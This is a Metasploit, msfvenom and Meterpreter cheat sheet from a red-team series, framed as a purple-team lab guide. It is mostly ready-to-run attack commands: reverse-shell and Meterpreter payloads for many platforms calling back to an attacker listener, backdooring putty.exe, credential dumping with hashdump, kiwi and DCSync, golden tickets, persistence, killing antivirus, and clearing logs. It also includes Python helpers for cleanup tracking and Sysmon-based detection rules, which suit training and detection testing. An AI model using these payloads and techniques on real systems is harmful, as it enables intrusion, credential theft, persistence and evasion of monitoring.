Metasploit: Quick Reference Sheet


This entry is part 20 of 29 in the series Red Team Engagements


Metasploit / msfvenom / Meterpreter Cheat Sheet
msfconsole Basics
Launching & Global Commands

Command | Description
msfconsole | Start the framework
msfconsole -q | Start quietly, no banner
msfconsole -r script.rc | Auto-run a resource script on start
help | List all commands
help <cmd> | Help for a specific command
banner | Print a random banner (harmless fun)
version | Framework version info
exit / quit | Leave msfconsole
Global Variables & History

Command | Description
setg RHOSTS 10.10.10.5 | Set a global variable (persists across modules)
unsetg RHOSTS | Unset a global variable
save | Save the current datastore/config so it survives a restart
history | Show console command history
makerc out.rc | Dump the commands entered this session to a resource script
irb | Drop to a Ruby interactive shell
load <plugin> | Load a plugin (e.g. nessus, sqlmap)
Use setg for RHOSTS/LHOST/LPORT once per engagement to avoid re-typing them for every module. A module-level set overrides the global value for that module only, and a global value is removed with unsetg, not unset.
Jobs, Threads & Logging

Command | Description
jobs | List background jobs
jobs -k <id> | Kill a job
jobs -K | Kill all jobs
spool /tmp/msf.log | Log console output to a file
route add <net> <mask> <sid> | Route traffic for a subnet through a session
sessions -l | List active sessions
sessions -i <id> | Interact with a session
Workspace & Database
Database & Workspace Management

Database Setup
Command | Description
db_status | Check DB connectivity
db_connect <user>:<pass>@<host>/<db> | Manual DB connect (e.g. user msf, database msf)
db_nmap -sV -A 10.10.10.0/24 | Nmap scan, results stored in the DB
db_import scan.xml | Import Nmap/Nessus/Nexpose results
db_export -f xml report.xml | Export workspace data

Workspaces
Command | Description
workspace | List workspaces
workspace -a silent_ledger | Add and switch to a workspace
workspace silent_ledger | Switch active workspace
workspace -d old_op | Delete a workspace
Querying Stored Data

Hosts, Services, Vulns, Creds
Command | Description
hosts | List discovered hosts
hosts -R | Set RHOSTS from all hosts in the workspace
services -p 445 | Filter services by port
vulns | List discovered vulnerabilities
creds | List captured credentials
creds add user:admin password:P@ss123 | Manually add a credential
loot | List collected loot (dumps, files)
notes | List analyst notes on hosts
Searching for Modules

search Syntax
Command | Description
search eternalblue | Keyword search
search type:exploit platform:windows smb | Filtered search
search cve:2021-34527 | Search by CVE
search rank:excellent name:apache | Filter by reliability rank
search date:2024 windows local | Recent local privesc modules

Module Types
exploit/, auxiliary/, post/, payload/, encoder/, nop/, evasion/
Selecting & Inspecting Modules

Load a Module
Command | Description
use exploit/windows/smb/ms17_010_eternalblue | Load by full path
use 3 | Load by index from the last search results
back | Unload the current module

Inspect Before Running
Command | Description
info | Full module details, references, targets
show options | Required/optional datastore options
show targets | Valid exploit targets
show payloads | Compatible payloads for the module
show advanced | Advanced tuning options
check | Test for the vulnerability without exploiting (only where the module implements a check; otherwise it reports that it cannot)
Setting Options & Running
Configuring & Executing

Core Options
Command | Description
set RHOSTS 10.10.10.5 | Target host(s)
set RPORT 445 | Target port
set PAYLOAD windows/x64/meterpreter/reverse_tcp | Attach a payload
set LHOST 10.10.10.200 | Listener/callback address
set LPORT 4444 | Listener port
set TARGET 0 | Explicit exploit target index

Run
Command | Description
exploit | Run the exploit (foreground)
exploit -j -z | Run as a background job, do not interact with the session
run | Alias for exploit (also used for auxiliary/post modules)
Session Management

Working With Sessions
Command | Description
sessions | List all sessions
sessions -i 1 | Interact with session 1
sessions -u 1 | Upgrade a plain shell to Meterpreter
sessions -k 1 | Kill session 1
sessions -K | Kill all sessions
sessions -C sysinfo -i 1 | Run one Meterpreter command on a session
background | (Inside a session) return to msfconsole, keep the session alive
Prefer exploit -j -z for engagements with multiple simultaneous targets so sessions stack up in the background.
msfvenom Syntax
Core Syntax & Flags (T1027, T1204)

Flag | Description | Example
-p | Payload path | windows/x64/meterpreter/reverse_tcp
-a | Target architecture | x86 / x64
--platform | Target platform | windows / linux / osx / android
-f | Output format | exe / elf / raw / psh / apk
-e | Encoder (must match the payload architecture) | x86/shikata_ga_nai
-i | Encoder iterations | 3
-b | Bad chars to avoid | '\x00\x0a\x0d'
-x | Template executable to inject the payload into | putty.exe
-k | Keep template functionality (payload runs in a new thread) | used together with -x
-o | Output file | shell.exe
-n | Prepend a NOP sled of this many bytes | 16
--smallest | Generate the smallest possible payload (tries encoders/iterations for size) | 
Discovery Commands

msfvenom -l payloads     # List all payloads
msfvenom -l encoders     # List all encoders
msfvenom -l formats      # List all output formats
msfvenom -l nops         # List NOP generators
msfvenom -p windows/meterpreter/reverse_tcp --list-options   # Payload-specific options
Staged payloads (e.g. windows/meterpreter/reverse_tcp) are smaller because only the stager is embedded; the handler sends the rest after connect-back, so it must be running and set to the same staged payload. Stageless payloads (windows/meterpreter_reverse_tcp) embed everything, so they are larger but need no second-stage download. Either way, PAYLOAD on the handler must match the msfvenom payload exactly.
Payload Generation One-Liners
Windows Payloads

EXE (staged Meterpreter)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f exe -o shell.exe
PowerShell (in-memory)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f psh-reflection -o shell.ps1
DLL (sideloading)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f dll -o shell.dll
HTA (phishing delivery)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f hta-psh -o shell.hta
MSI (installer-based)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f msi -o shell.msi
Linux / macOS Payloads

Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f elf -o shell.elf
Linux plain reverse shell (no Meterpreter; behaves like a netcat reverse shell)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f elf -o rshell.elf
macOS Mach-O
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f macho -o shell.macho
Bash one-liner (no binary)
msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.200 LPORT=4444 -f raw
Python (cross-platform)
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.py
Web / Mobile Payloads

PHP Web Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.php
JSP (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f raw -o shell.jsp
WAR (Tomcat manager deploy)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f war -o shell.war
Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -o shell.apk
ASPX (IIS deploy)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -f aspx -o shell.aspx
Output Formats, Encoders & Template Injection
Encoding & Bad Character Avoidance

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -e x86/shikata_ga_nai -i 5 -b '\x00\x0a\x0d' -f exe -o shell.exe
Modern AV/EDR signature-matches shikata_ga_nai easily; treat encoding as a way to keep bad characters out of an exploit buffer (or as an obfuscation layer for lab exercises), not as a bypass technique against production EDR. The encoder must match the payload architecture: x86/shikata_ga_nai pairs with a 32-bit payload, not with windows/x64/...

Common Formats (-f)
exe, elf, macho, dll, raw, c, python, psh, psh-reflection, hta-psh, war, aspx, jar, vba, msi
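A check to run on the generated bytes before they go into an exploit buffer, as an added example (not code from the page or from Metasploit): msfvenom -b only guarantees the blob it emits avoids the listed bytes, so anything edited afterwards, or built without -b, deserves an independent pass. The functions read the -b string, the raw bytes of -f raw, and the C array text that -f c prints; the sample array below is constructed and is not real shellcode.

```python
"""Verify a generated payload contains none of the bad characters given to msfvenom -b."""
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_badchars(spec: str) -> bytes:
    """'\\x00\\x0a\\x0d' (the string passed to -b, quotes optional) -> b'\\x00\\n\\r'."""
    spec = spec.strip().strip("'\"")
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(spec))


def from_c_array(text: str) -> bytes:
    """Payload bytes from msfvenom -f c output: unsigned char buf[] = "\\xfc\\x48...";"""
    body = text.split("=", 1)[1] if "=" in text else text
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(body))


def find_badchars(payload: bytes, bad: bytes) -> list:
    """Every (offset, byte) where a forbidden byte occurs; an empty list means clean."""
    badset = set(bad)
    return [(i, b) for i, b in enumerate(payload) if b in badset]


def report(payload: bytes, bad: bytes) -> str:
    """One-line verdict suitable for an engagement log."""
    hits = find_badchars(payload, bad)
    if not hits:
        return f"clean: {len(payload)} bytes, none of {bad.hex()} present"
    where = ", ".join(f"0x{b:02x}@{i}" for i, b in hits)
    return f"BAD: {len(hits)} hit(s): {where}"


# Constructed sample in the shape -f c prints, with a NUL and a newline byte planted inside.
SAMPLE_C = '''unsigned char buf[] =
"\\xfc\\x48\\x83\\xe4\\xf0\\x00\\x41\\x0a\\x90";
'''

if __name__ == "__main__":
    bad = parse_badchars("'\\x00\\x0a\\x0d'")
    print(report(from_c_array(SAMPLE_C), bad))   # flags the bytes at offsets 5 and 7
    with open("shell.bin", "rb") as f:           # a -f raw output, if one is present
        print(report(f.read(), bad))
```

Run it on the raw output (-f raw -o shell.bin) and on the -f c listing; both go through the same check, so an encoder that silently produced a forbidden byte shows up as an offset you can trace back to the buffer.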
Template / Executable Injection (T1027.002)

Inject into a legitimate binary (template and payload architecture must match: a 64-bit putty.exe for an x64 payload)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -x putty.exe -k -f exe -o putty_backdoored.exe
Combine with encoding + multiple iterations (32-bit payload and template here, because the encoder is x86)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=4444 -e x86/shikata_ga_nai -i 3 -x app.exe -k -f exe -o app_bd.exe
The -k flag keeps the original binary's functionality by running the payload in a new thread alongside it, which is what makes a phishing-lure simulation in a lab look realistic; without -k the template's original code does not run.
Listener / Handler Setup
multi/handler (T1071)

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false   # Keep listening after the first session
exploit -j -z             # Background job, do not auto-interact
Always start the handler before executing the payload on the target, and match PAYLOAD, LHOST and LPORT exactly to what was used in msfvenom: a staged payload needs a handler set to the same staged payload, and a stageless one needs the stageless variant.
Resource Scripts for Repeatable Handlers

handler.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.200
set LPORT 4444
set ExitOnSession false
exploit -j -z
Launch with it
msfconsole -q -r handler.rc
Useful for consistent, version-controlled handler configs across repeated Operation Silent Ledger runs.
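A small generator that derives both the msfvenom one-liner and the handler.rc above from a single spec, as an added example (not code from the page or from Metasploit): PAYLOAD, LHOST and LPORT cannot drift apart, an existing rc file can be checked against the spec, and the SHA-256 of the dropped file is recorded for detection scoring. Host, port and file names are the cheat sheet's placeholders; is_stageless relies only on the payload naming convention (meterpreter_reverse_tcp vs meterpreter/reverse_tcp).

```python
"""Keep the msfvenom payload and its multi/handler resource script in sync from one spec."""
import hashlib
import shlex
from dataclasses import dataclass
from pathlib import Path


@dataclass(frozen=True)
class PayloadSpec:
    payload: str            # e.g. windows/x64/meterpreter/reverse_tcp
    lhost: str              # callback address, must be reachable from the target
    lport: int
    fmt: str = "exe"
    out: str = "shell.exe"


def is_stageless(payload: str) -> bool:
    """Stageless names join stage and transport with '_' (meterpreter_reverse_tcp);
    staged names use '/' (meterpreter/reverse_tcp). Either way PAYLOAD must match."""
    return payload.rsplit("/", 1)[-1].startswith(("meterpreter_", "shell_"))


def msfvenom_cmd(spec: PayloadSpec) -> str:
    """The msfvenom one-liner, shell-quoted so it can be pasted or logged verbatim."""
    args = ["msfvenom", "-p", spec.payload, f"LHOST={spec.lhost}", f"LPORT={spec.lport}",
            "-f", spec.fmt, "-o", spec.out]
    return " ".join(shlex.quote(a) for a in args)


def handler_rc(spec: PayloadSpec) -> str:
    """handler.rc in the form shown above, derived from the same spec as the payload."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {spec.payload}",
        f"set LHOST {spec.lhost}",
        f"set LPORT {spec.lport}",
        "set ExitOnSession false",
        "exploit -j -z",
    ]) + "\n"


def parse_rc(text: str) -> dict:
    """Datastore values from an existing rc file ('set KEY value' lines, keys upper-cased)."""
    values = {}
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0] == "set":
            values[parts[1].upper()] = parts[2].strip()
    return values


def rc_matches(rc_text: str, spec: PayloadSpec) -> bool:
    """True only if this handler would catch the payload built from spec."""
    v = parse_rc(rc_text)
    return (v.get("PAYLOAD") == spec.payload and v.get("LHOST") == spec.lhost
            and v.get("LPORT") == str(spec.lport))


def fingerprint_bytes(data: bytes) -> dict:
    """SHA-256 and size: what the blue team will match on, so record them at build time."""
    return {"sha256": hashlib.sha256(data).hexdigest(), "size": len(data)}


def fingerprint(path) -> dict:
    p = Path(path)
    return {"file": p.name, **fingerprint_bytes(p.read_bytes())}


if __name__ == "__main__":
    spec = PayloadSpec("windows/x64/meterpreter/reverse_tcp", "10.10.10.200", 4444)
    print(msfvenom_cmd(spec))                      # run this, then fingerprint(spec.out)
    Path("handler.rc").write_text(handler_rc(spec))
    print("stageless" if is_stageless(spec.payload) else "staged", "payload; handler.rc written")
```

Launch the handler with msfconsole -q -r handler.rc as above; keep the spec, the msfvenom command and the fingerprint together in the engagement notes so step 3 of the workflow (track hash/filename) is satisfied automatically.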
Meterpreter — Core Commands
Situational Awareness

Command | Description
sysinfo | OS, hostname, architecture
getuid | Current user context
getpid | Current process ID
ps | List running processes
getprivs | List enabled privileges
enumdesktops | List accessible desktops
idletime | How long the user has been idle (for opsec timing)
screenshot | Capture the active desktop
webcam_list / webcam_snap | Enumerate/capture webcam
Session & Shell Control

Command | Description
background | Send the session to the background
shell | Drop to a native OS shell
exit / quit | Terminate the Meterpreter session
irb | Ruby shell within the session context
info | Session metadata
guid | Session GUID (for reconnect)
channel -l | List active I/O channels
sleep <secs> | Make Meterpreter go quiet for the given seconds, then re-establish the session
Meterpreter — Filesystem & Process
Filesystem Operations (T1005)

Navigation
Command | Description
pwd / getwd | Print working directory
cd C:\\Users\\Public | Change directory
ls / dir | List directory contents
lpwd / lcd | Local (attacker) working directory

Transfer
Command | Description
upload evil.exe C:\\Windows\\Temp\\ | Upload a file to the target
download C:\\Users\\admin\\creds.txt . | Download a file from the target
edit config.txt | Edit a remote file with vim
cat notes.txt | Print file contents
rm evidence.log | Delete a file (anti-forensics)
timestomp file.txt -v | View MACE timestamps; -z sets them, -f copies them from another file (T1070.006)
Process Manipulation & Migration (T1055)

Process Control
Command | Description
ps | List processes (PID/PPID/arch/user)
migrate <PID> | Move the session into another process
kill <PID> | Terminate a process
execute -f cmd.exe -i -H | Execute and interact, hidden window
run post/windows/manage/migrate | Auto-migrate to a stable process
Migrate into a long-lived process (e.g. explorer.exe) early so the session survives when the spawning process (e.g. an Office macro host) closes. The session inherits the target process's context, so migrating from SYSTEM into a medium-integrity process gives up the elevated token; escalate first, or pick a process at the integrity level you need.
Meterpreter — Network & Pivoting
Network Enumeration

Command | Description
ipconfig / ifconfig | Interface details of the compromised host
arp | ARP cache, nearby hosts
netstat | Active connections (like OS netstat)
route | Routing table on the target
getproxy | Proxy configuration in use
run post/windows/gather/enum_ad_computers | AD computer enumeration
Pivoting & Port Forwarding (T1090)

Route Traffic Through a Session
Command | Description
run autoroute -s 172.30.1.0/24 | Add a pivot route via this session (legacy script; the module form is run post/multi/manage/autoroute SUBNET=172.30.1.0/24)
run autoroute -p | Print current routes
background, then route add 172.30.1.0 255.255.255.0 1 | Manual route via session ID 1, entered in msfconsole

Port Forwarding
Command | Description
portfwd add -l 3389 -p 3389 -r 172.30.1.10 | Forward local port 3389 to RDP on the internal host
portfwd list | List active forwards
portfwd delete -l 3389 | Remove a forward

SOCKS Proxy
Command | Description
use auxiliary/server/socks_proxy | Start the SOCKS proxy module (VERSION selects 4a or 5)
set SRVPORT 1080, then run | Chain tools through it with proxychains; the routes added above decide which traffic goes through the session
Privilege Escalation & Credential Access
Privilege Escalation (T1068)

Automated Escalation
Command | Description
getsystem | Try all built-in SYSTEM techniques in order
getsystem -t 1 | Named pipe impersonation (technique 1; installs a short-lived service)
run post/multi/recon/local_exploit_suggester | Suggest local privesc exploits
use exploit/windows/local/bypassuac | UAC bypass module

Token Manipulation (T1134)
Command | Description
load incognito | Load the token impersonation extension
list_tokens -u | List available tokens by user
impersonate_token "NORTHBRIDGE\\admin" | Impersonate a captured token
rev2self | Revert to the original token
Credential Access (T1003)

Hashdump & Mimikatz/Kiwi
Command | Description
hashdump | Dump local SAM hashes (needs SYSTEM)
load kiwi | Load the mimikatz-based extension
creds_all | Dump all available credential types
lsa_dump_sam | SAM database via LSA
lsa_dump_secrets | LSA secrets (service account creds)
dcsync_ntlm NORTHBRIDGE\\krbtgt | DCSync a specific account; needs replication rights, e.g. Domain Admin (T1003.006)

Golden/Silver Ticket (T1558.001)
Command | Description
golden_ticket_create -u admin -d northbridge.local -k <krbtgt-hash> -s <SID> -t ticket.tck | Forge a Golden Ticket
kerberos_ticket_use ticket.tck | Load the ticket into the session
kerberos_ticket_list | List cached tickets
Persistence
Persistence Mechanisms (T1547, T1053.005)

Post Modules
Command | Description
run post/windows/manage/persistence_exe | Install EXE persistence (registry Run key)
run persistence -X -i 30 -p 4444 -r 10.10.10.200 | Legacy persistence script (autorun at boot); deprecated, prefer the modules
use exploit/windows/local/registry_persistence | Registry-based persistence module

Scheduled Task / Service
Command | Description
execute -f cmd.exe -a "/c schtasks /create /tn upd /tr C:\\…\\shell.exe /sc onlogon" | Scheduled task persistence
run post/windows/manage/persistence_service | Install as a Windows service
Track every persistence artifact you drop (registry keys, task names, service names, file paths) so cleanup and blue-team detection validation stay accurate for the exercise report.
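One way to do that tracking, as an added example (not code from the page or from Metasploit): every artifact is registered at the moment it is dropped, the registration hands back the Windows command that removes it, and the cleanup plan and the IOC table for the report are produced from the same records. The artifact kinds, their ATT&CK IDs and the cleanup templates are assumptions for a lab; hostnames, names and paths are constructed placeholders.

```python
"""Record dropped persistence artifacts and derive cleanup commands and IOCs from one list."""
from dataclasses import dataclass, field

# kind -> (ATT&CK ID, Windows cleanup command template). Assumed mapping; the templates
# use stock built-in commands, adjust for HKLM keys or per-host paths as needed.
CLEANUP = {
    "file":    ("T1105",     'del /f /q "{path}"'),
    "runkey":  ("T1547.001", 'reg delete "{key}" /v {name} /f'),
    "schtask": ("T1053.005", 'schtasks /delete /tn {name} /f'),
    "service": ("T1543.003", 'sc stop {name} & sc delete {name}'),
}


@dataclass
class Artifact:
    host: str
    kind: str
    name: str = ""      # task, service or registry value name
    path: str = ""      # dropped file, or the binary a task/service points at
    key: str = ""       # registry key (runkey only)
    sha256: str = ""    # hash of the dropped file, for the IOC table

    @property
    def technique(self) -> str:
        return CLEANUP[self.kind][0]

    def cleanup_cmd(self) -> str:
        return CLEANUP[self.kind][1].format(name=self.name, path=self.path, key=self.key)


@dataclass
class Tracker:
    artifacts: list = field(default_factory=list)

    def register(self, art: Artifact) -> str:
        """Record the artifact as it is dropped and hand back the command that removes it."""
        if art.kind not in CLEANUP:
            raise ValueError(f"unknown artifact kind {art.kind!r}")
        self.artifacts.append(art)
        return art.cleanup_cmd()

    def cleanup_plan(self, host: str) -> list:
        """Removal commands in reverse drop order, so a task or service goes before its binary."""
        return [a.cleanup_cmd() for a in reversed(self.artifacts) if a.host == host]

    def iocs(self) -> list:
        """(host, ATT&CK ID, indicator, sha256) rows for the detection-coverage table."""
        return [(a.host, a.technique, a.path or a.name or a.key, a.sha256) for a in self.artifacts]


if __name__ == "__main__":
    t = Tracker()
    t.register(Artifact("WS01", "file", path=r"C:\Windows\Temp\shell.exe", sha256="<hash of shell.exe>"))
    t.register(Artifact("WS01", "schtask", name="upd", path=r"C:\Windows\Temp\shell.exe"))
    t.register(Artifact("WS01", "runkey", name="upd",
                        key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"))
    for cmd in t.cleanup_plan("WS01"):
        print(cmd)
    for row in t.iocs():
        print(row)
```

The cleanup commands are meant to be run on the host at step 10 of the workflow (through the session's shell or after the exercise by the system owner); the IOC rows are what the blue team checks its alerts against.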
Cleanup / Anti-Forensics (T1070)

Command | Description
clearev | Clear the Windows Application, System and Security event logs
run event_manager -c | Clear specific event logs (legacy script)
timestomp <file> -z "MM/DD/YYYY HH:MM:SS" | Set an arbitrary timestamp
rm <path> | Remove dropped tooling
In a lab, clearing logs deliberately breaks detection validation; use these only to test whether your monitoring stack (Wazuh/Sysmon/Splunk) actually alerts on Security event ID 1102 (audit log cleared) and System event ID 104 (log cleared).
Post-Exploitation Modules
Gather / Recon Post Modules (T1082)

Module | Description
post/windows/gather/checkvm | Detect virtualization (sandbox/evasion check)
post/windows/gather/enum_logged_on_users | Currently/recently logged-on users
post/windows/gather/enum_shares | Enumerate SMB shares
post/windows/gather/credentials/credential_collector | Harvest hashes and tokens on the host into the DB
post/windows/gather/enum_domain | Identify the AD domain
post/multi/gather/env | Dump environment variables
post/linux/gather/enum_configs | Linux config/service enumeration
Manage / Escalate Post Modules

Module | Description
post/multi/manage/shell_to_meterpreter | Upgrade a plain shell to Meterpreter
post/windows/manage/migrate | Automated stable migration
post/windows/manage/enable_rdp | Enable RDP on the target
post/windows/manage/killav | Attempt to kill known AV processes
post/multi/recon/local_exploit_suggester | Suggest applicable local exploits
post/windows/gather/smart_hashdump | Dump local hashes (and domain hashes on a DC) using the least noisy method available
Run post modules with run <module> from an active Meterpreter session, or from msfconsole with use <module>, set SESSION <id>, run.
Auxiliary Scanners & Recon
Service Scanners (T1046)

Module | Description
auxiliary/scanner/portscan/tcp | Basic TCP port scan
auxiliary/scanner/smb/smb_version | Identify SMB version/OS
auxiliary/scanner/ssh/ssh_version | SSH banner grab
auxiliary/scanner/http/http_version | HTTP server fingerprint
auxiliary/scanner/rdp/rdp_scanner | RDP availability/version

Auth / Spray Modules (T1110)

Module | Description
auxiliary/scanner/smb/smb_login | SMB credential validation
auxiliary/scanner/ssh/ssh_login | SSH bruteforce/validation
auxiliary/scanner/winrm/winrm_login | WinRM credential check
auxiliary/gather/kerberos_enumusers | Kerberos username enumeration (valid users answer AS-REQ pre-auth differently from unknown ones)
set BLANK_PASSWORDS false | Common spray tuning option (see also USER_AS_PASS, STOP_ON_SUCCESS)

Exploitation Aux

Module | Description
auxiliary/admin/smb/ms17_010_command | EternalBlue command execution
auxiliary/scanner/smb/smb_ms17_010 | EternalBlue vulnerability check
auxiliary/dos/… | DoS modules: lab only, never against live targets
auxiliary/spoof/nbns/nbns_response | NBNS spoofing (relay setup)
Evasion & Detection-Awareness Notes
Evasion Module & Considerations (T1027)

Framework Evasion Module Type
Command | Description
use evasion/windows/windows_defender_exe | Built-in Defender-evasion generator
set PAYLOAD, LHOST and LPORT, then run | Writes the generated binary locally and prints its path
Default Meterpreter reverse_tcp is heavily signatured by every modern EDR. In purple team exercises the value is in measuring detection coverage, not defeating controls; treat evasion as a way to surface detection gaps to fix, not as a production bypass goal.

Common Detection Surfaces

Artifact | Where it shows up
Named pipe (getsystem technique 1, reverse_named_pipe payloads) | Sysmon Event 17/18 (pipe created/connected); default names such as msf-pipe are trivially signatured
Process migration | Sysmon Event 8 (CreateRemoteThread) from the session process into the target
getsystem | Named pipe impersonation: service install (System 7045 / Security 4697) whose ImagePath echoes into a named pipe, plus Sysmon 1/17/18
hashdump | LSASS access: Sysmon Event 10, EDR alert
PSExec-style exec | Service creation: Event 7045/4697
clearev | Event ID 1102 (audit log cleared): very high fidelity
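The detection surfaces above turned into rules and run over a batch of sample events, as an added example (not code from the page or from Metasploit). The events are constructed dicts in the shape of Sysmon and Windows Security/System records (EventID, Channel and the Sysmon EventData field names), not real log exports; the labels returned are the Artifact names from the table, the allow-lists and pipe-name pattern are lab assumptions to tune for your estate, and the getsystem rule keys on the service ImagePath shape described in the table.

```python
"""Rules for the Metasploit artifacts in the table above, applied to constructed sample events."""
import re

# Assumed lab allow-lists: processes that legitimately create remote threads or open LSASS.
REMOTE_THREAD_ALLOW = (r"\windows\system32\csrss.exe", r"\windows\system32\wininit.exe")
LSASS_ALLOW = (r"\windows\system32\svchost.exe", r"\windows\system32\wininit.exe",
               r"\program files\windows defender\msmpeng.exe")
# Metasploit's default reverse_named_pipe name (msf-pipe) plus anything obviously framework-named.
PIPE_PATTERN = re.compile(r"\\(msf-pipe|msf[-_]|meterpreter)", re.I)
# getsystem technique 1 installs a service whose ImagePath echoes into a named pipe.
PIPE_SERVICE = re.compile(r"cmd(\.exe)?\s+/c\s+echo.*>\s*\\\\\.\\pipe\\", re.I)


def _lower(ev, key):
    return str(ev.get(key, "")).lower()


def _allowed(ev, key, allow):
    return any(_lower(ev, key).endswith(a) for a in allow)


def classify(ev: dict) -> list:
    """(artifact, reason) pairs the event matches, named as in the table; [] if benign."""
    hits = []
    eid, ch = ev.get("EventID"), ev.get("Channel", "")
    sysmon = ch.startswith("Microsoft-Windows-Sysmon")
    if sysmon and eid in (17, 18) and PIPE_PATTERN.search(ev.get("PipeName", "")):
        hits.append(("named-pipe", f"{ev.get('PipeName')} by {ev.get('Image')}"))
    if sysmon and eid == 8 and not _allowed(ev, "SourceImage", REMOTE_THREAD_ALLOW):
        hits.append(("process-migration",
                     f"CreateRemoteThread {ev.get('SourceImage')} -> {ev.get('TargetImage')}"))
    if (sysmon and eid == 10 and _lower(ev, "TargetImage").endswith(r"\lsass.exe")
            and not _allowed(ev, "SourceImage", LSASS_ALLOW)):
        hits.append(("hashdump",
                     f"LSASS opened by {ev.get('SourceImage')} (GrantedAccess {ev.get('GrantedAccess')})"))
    if (ch == "System" and eid == 7045) or (ch == "Security" and eid == 4697):
        path = ev.get("ImagePath", "")
        label = "getsystem" if PIPE_SERVICE.search(path) else "psexec-service"
        hits.append((label, f"service {ev.get('ServiceName')} installed: {path}"))
    if (ch == "Security" and eid == 1102) or (ch == "System" and eid == 104):
        hits.append(("clearev", f"{ch} log cleared by {ev.get('SubjectUserName', '?')}"))
    return hits


def run_rules(events) -> list:
    """Flat (event index, artifact, reason) list across a batch, for a quick coverage check."""
    return [(i, a, r) for i, ev in enumerate(events) for a, r in classify(ev)]


# Constructed sample events; field names follow Sysmon / Windows event data.
SAMPLE_EVENTS = [
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 17,
     "Image": r"C:\Users\Public\shell.exe", "PipeName": r"\msf-pipe"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 8,
     "SourceImage": r"C:\Users\Public\shell.exe", "TargetImage": r"C:\Windows\explorer.exe"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 10,
     "SourceImage": r"C:\Users\Public\shell.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 10,
     "SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"Channel": "System", "EventID": 7045, "ServiceName": "QwLpzRtB",
     "ImagePath": r"cmd.exe /c echo QwLpzRtB > \\.\pipe\QwLpzRtB"},
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "admin"},
    {"Channel": "Security", "EventID": 4624, "SubjectUserName": "admin"},
]

if __name__ == "__main__":
    for i, artifact, reason in run_rules(SAMPLE_EVENTS):
        print(f"[{i}] {artifact}: {reason}")
```

Feed it the events your SIEM exported for the exercise window; each artifact in the table that produces no hit is a gap to log in the purple team tracker. Note that any 7045/4697 is reported, since the PSExec-style service has no distinctive ImagePath beyond its random name, so that rule is the one to tune most.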
Console Shortcuts & Tips
msfconsole Keybindings

Key | Action
Tab | Autocomplete module/command/option
Ctrl + C | Interrupt the current command
Ctrl + Z | Background the current Meterpreter session
↑ / ↓ | Cycle command history
Ctrl + R | Reverse search history
? | Alias for help

Practical Tips

Command | Description
unset all | Clear all set datastore options
reload_all | Reload all modules (after adding or editing a custom module)
edit | Open the current module's source in $EDITOR
reload | Reload the current module after edits
color false | Disable ANSI colour (for logging/CI)
Engagement Workflow (Purple Team Lab)
End-to-End Kill Chain Checklist

1. Workspace & DB Setup: workspace -a silent_ledger — keep hosts/creds/loot scoped per campaign
2. Recon & Scanning: db_nmap -sV -A target-range — feeds the hosts/services tables automatically
3. Payload Generation: msfvenom -p … -f exe -o payload.exe — track hash/filename for detection scoring
4. Handler + Delivery: exploit/multi/handler backgrounded, then deliver the payload via the chosen initial access vector
5. Stabilize Session: migrate to a stable process, getprivs, sysinfo — confirm the foothold
6. Privesc & Credential Access: getsystem, load kiwi, hashdump — map each action to a TTP for scoring
7. Lateral Movement: psexec/wmiexec modules or pass-the-hash into Server Zone hosts
8. Domain Compromise: dcsync_ntlm krbtgt, golden_ticket_create — full domain persistence
9. Cross-Reference Detections: check Wazuh/Elastic/Splunk for each TTP fired — log gaps in the purple team tracker
10. Cleanup & Report: sessions -K, remove dropped tooling, document IOCs and detection coverage per ATT&CK ID
